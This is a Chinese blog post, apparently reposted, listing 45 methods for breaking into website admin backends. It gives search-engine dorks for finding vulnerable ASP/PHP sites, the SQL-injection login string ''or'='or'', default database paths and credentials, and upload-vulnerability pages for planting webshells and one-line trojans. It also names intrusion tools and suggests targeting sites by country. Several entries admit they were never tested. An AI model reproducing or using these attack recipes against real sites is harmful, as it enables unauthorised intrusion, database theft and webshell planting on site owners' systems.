• 45种攻入网站后台的方法


    45种攻入后台的方法
    1、到Google搜索,site:cq.cn inurl:asp
    2、到Google,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!
    3、利用挖掘鸡和一个ASP木马:
    文件名是login.asp
    ……
    路径组是/manage/
    关键词是went.asp
    用’or’='or’来登陆
    4、以下这个方法因为太多人做过,所以一些网站管理员对此都有防范之心了,成功率不高:
    关键字:“Co Net MIB Ver 1.0网站后台管理系统”
    帐号密码为 ‘or’='or’
    5、动感购物系统,呵呵。想到了明小子:
    inurl:help.asp登陆,如未注册成为会员!
    upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞。
    6、默认数据库地址blogdata/acblog.asa
    关键字:acblog
    7、百度 /htdocs
    注册里可以直接上传asa文件!
    8、/Database/#newasp.mdb
    关键词:NewAsp SiteManageSystem Version
    9、用挖掘机
    关键字:Powered by WEBBOY
    页面:/upfile.asp
    10、baidu中搜索关键字Ver5.0 Build 0519
    (存在上传漏洞)
    11、Upfile_Article.asp bbs/upfile.asp
    输入关键字:powered by mypower ,
    应该是动什么上传漏洞来着?用的人也比较多
    估计明小子,挖掘鸡就可以了
    12、inurl:winntsystem32inetsrv
    在google里面输入这个就可以找到很多网站
    13、现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp
    14、关键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买站内流言友情连接 本站论坛
    挖掘鸡的关键字 添 setup.asp
    15、VBulletin论坛的数据库
    默认数据库地址!
    /includes/functions.php
    工具:
    1)网站猎手。下载地址:百度 Google!
    2)Google
    关键字:
    Powered by: vBulletin Version 3.0.1
    Powered by: vBulletin Version 3.0.2
    Powered by: vBulletin Version 3.0.3
    其中一个就可以了
    16
    1)打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
    open source。
    这是一个商场系统。
    2)网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
    猜到,comersus.mdb. 是数据库名
    数据库都是放在database/ 后的,
    所以database/comersus.mdb
    comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
    那样把前一个’’store/”除去,再加上database/comersus.mdb 试试
    都是默认数据库地址
    17、无忧传奇官方站点程序。
    1)后台管理地址:http://您的域名/msmiradmin/
    或者是 http://您的域名/admin.asp
    2)默认后台管理帐号:msmir
    3)默认后台管理密码:msmirmsmir 或 msmir
    数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
    或者是 http://您的域名/msmirdata/msmirArticle.asa
    数据库连接文件为 ***********/Conn.asp
    也是默认数据库地址。 现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`
    18、百度里输入/skins/default/
    19、利用挖掘机
    关键机:power by Discuz
    路径:/wish.php
    配合:
    Discuz!论坛 wish.php远程包含漏洞
    ……
    20、上传漏洞.
    工具 : 当然还是明小子了
    网站猎手 或者挖掘鸡了。
    关键字powered by mypower
    检测的页面或文件插入upfile_photo.asp
    这个用的人也N多。。
    21、新云漏洞
    这个漏洞ACCESS和SQL版通吃。
    Google搜索关键字 “关于本站 – 网站帮助 – 广告合作 – 下载声明 – 友情连接 – 网站地图 – 管理登录”
    把flash/downfile.asp?url=uploadfile/http://www.cnblogs.com/conn.asp提交到网站根目录。就可以下载conn.asp
    以源码,软件等下载站居多。
    大家时常碰到数据库如果前面或者中间+了# 可以用#替换就可以下载了
    database#newasp.mdb
    如:#xzws.mdb 改成#xzws.mdb
    收集的。没试过。。。 – -!
    22、通吃所有商城+动力上传系统
    使用工具:挖掘鸡 v1.1 明小子
    商城入侵:
    关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
    漏洞页面:upload.asp
    upfile_flash.asp
    还是上传漏洞拿webshell
    23、注射漏洞
    百度搜索ioj’s blog
    24、动易
    列目录
    admin_articlerecyclebin.asp
    inurl:admin_articlerecyclebin.asp
    25、
    工具:网站猎手
    关键词:inurl:Went.asp
    后缀:manage/login.asp
    口令:’or’='or’
    这软件还不是太熟悉。 – -
    26、
    入侵魔兽私服
    需要的工具:ASP木马 – -!废话了。
    明小子
    关键字:All Right Reserved Design:游戏联盟
    后台地址:admin/login.asp
    数据库的地址:chngame/#chngame.mdb
    都默认的。数据库闹下来自己解密吧不多说了。
    27、
    漏洞是利用管理员iis设置的失误
    用baidu 关键字就是比较罕见的脚本名
    动网: ReloadForumCache.asp
    Leadbbs: makealltopanc.asp
    BBSXP: admin_fso.asp
    动易: admin_articlerecyclebin.asp
    好像比较少吧不太清楚了这个。。
    28、
    国外站的爆库漏洞
    关键字:sad Raven’s Guestbook
    密码地址:/passwd.dat
    后台地址:/admin.php
    29、
    Discuz 4.1.0跨站漏洞
    利用工具:1)WAP浏览器
    2)WAP编码转换器
    关键字:”intextiscuz! 4.1.0″
    WAP浏览器…………………………!!
    30、
    关键字:尚奈克斯
    后台路径/system/manage.asp
    直接传ASP木马
    挖掘机去。。 – -!
    31、
    工具
    1:网站猎手
    2:大马
    关键字:切勿关闭Cookies功能,否则您将不能登录
    插入diy.asp
    32、
    关键字:Team5 Studio All rights reserved
    默认数据库:data/team.mdb
    剩下的自己搞。不多说了
    33、
    工具: 挖掘机 辅臣数据库读取器
    关键字: 企业简介 产品展示 产品列表
    后缀添加: /database/myszw.mdb
    后台地址: admin/Login.asp
    都默认的。一样。数据库闹下来自己解密码去 。就行了。。 – -
    34、
    关键子 XXX inurl:Nclass.asp
    ……
    在”系统设置”里写个木马。
    会被保存到 在 config.asp内。
    35、
    不进后台照样拿动网WEBSHELL
    data.asp?action=BackupData 动网数据库备份默认路径
    没试过。。。不知道。
    36、
    工具:网站猎手 WebShell
    关键字:inurl:Went.asp
    后缀:manage/login.asp
    弱口令:’or’='or’
    也没试过。 。。。。。。
    37、
    关键字owered byCDN_NEWS
    随便扫遍文章加一个’ ,来试探注入点
    后台地址:admin_index.asp
    用啥工具我就不说了吧。。。。。。。。。
    38、
    入侵雷池新闻发布系统
    关键字:leichinews
    去掉leichinews后面的.
    打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
    再上传马…..
    进访问uppic anran.asp 登陆马.
    —-
    没试过。汗 ,收集来的。
    39、
    工具挖掘机就行了。
    关键字ower System Of Article Management Ver 3.0 Build 20030628
    默认数据库:databaseyiuwekdsodksldfslwifds.mdb
    后台地址:自己扫描!
    工具明小子。- -!怎么又是他啊。
    MD5自己解………
    (NND这个一扫一大堆。大家可以去试试。。)
    40、
    一、通过GOOGLE搜索找大量注入点
    关键字:asp?id=1 gov.jp/ asp?id=
    页数:100
    语言:想入侵哪个国家就填什么语言吧
    41、
    关键字:Powered by:94KKBBS 2005
    利用密码找回功能 找回admin
    提问:ddddd 回答:ddddd
    42、
    关键字:inurl:Went.asp
    后台为manage/login.asp
    后台密码: ‘or’=’ 或者 ‘or”=”or’ 登录 进入
    默认数据库地址atabase/DataShop.mdb
    43、
    关键字:****** inurl:readnews.asp
    把最后一个/改成 ,直接暴库,看密码,进后台
    随便添加个新闻 在标题输入我们的一句话木马
    44、
    工具:一句话木马
    BBsXp 5.0 sp1 管理员猜解器
    关键词:powered by bbsxp5.00
    进后台,备份一句话马!
    45、
    关键字:程序核心:BJXSHOP网上开店专家
    后台:/admin

  • 相关阅读:
    【转】使用scipy进行层次聚类和k-means聚类
    spark wordcont Spark: sortBy和sortByKey函数详解
    scala akka通信机制
    redis AOF 和RDB
    java虚拟机学习
    快速排序,一个爱情故事-java版
    Caused by: java.io.IOException: Added a key not lexically larger than previous.
    java.io.IOException: No FileSystem for scheme: hdfs
    " java.lang.NoSuchFieldError: HBASE_CLIENT_PREFETCH_LIMIT
    用户活跃度分析
  • 原文地址:https://www.cnblogs.com/webyihui/p/3984591.html
Copyright © 2020-2023  润新知